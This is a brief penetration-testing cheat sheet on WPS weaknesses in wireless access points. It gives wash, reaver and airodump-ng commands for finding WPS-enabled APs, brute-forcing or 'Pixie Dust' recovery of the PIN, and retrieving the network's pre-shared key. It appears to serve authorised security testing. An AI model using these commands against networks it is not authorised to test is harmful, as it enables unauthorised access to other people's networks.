WPS Vulnerabilities

WPS‑PIN (not PBC) is required for these attacks.

Check if WPS is enabled on the target AP before proceeding.

Identify APs with WPS enabled

wash -i <iface_mon>

wash comes from the tool Reaver

Online PIN bruteforce

Bruteforce PIN authentications online. Limited by throttling / authentication lockout.

reaver usage

"Pixie Dust" - Offline PIN recovery

Capture WPS M1/M2/M3 exchange packets and quickly crack offline due to AP with predictable PIN generation algorithms.

Exploitation

See if WPS-PIN is being offered and unlocked.

Identify APs with WPS enabled

wash -i <iface_mon>

wash comes from the tool Reaver

Attempt a Pixie test. If successful, the target's PIN will be recovered.

Run Pixie test, attempt to retrieve PIN for the AP.

reaver -i <iface_mon> -b <BSSID> -c <CH> -K -vv

Use the recovered PIN to retrieve the PSK.

Retrieve PSK using WPS PIN

reaver -i <iface_mon> -b <BSSID> -c <CH> -p <RECOVERED_PIN> -vv

Weak/default PIN algorithms

Online password guessing. Some APs have algorithms that generate predictable PINs. Generate one and try to use it.

Does not work if the PIN has been changed from its default.

Identify AP model info to determine if it is a model with a known weak PIN algorithm.

Check the Wireless Security Database to see if the AP is known to be vulnerable.

• Wireless Security Database

Identify APs with WPS enabled and enumerate AP model information

wash -i <iface_mon> -j

wash comes from the tool Reaver

airodump-ng alternative for enumerating AP model information

airodump-ng --manufacturer --wps <iface_mon>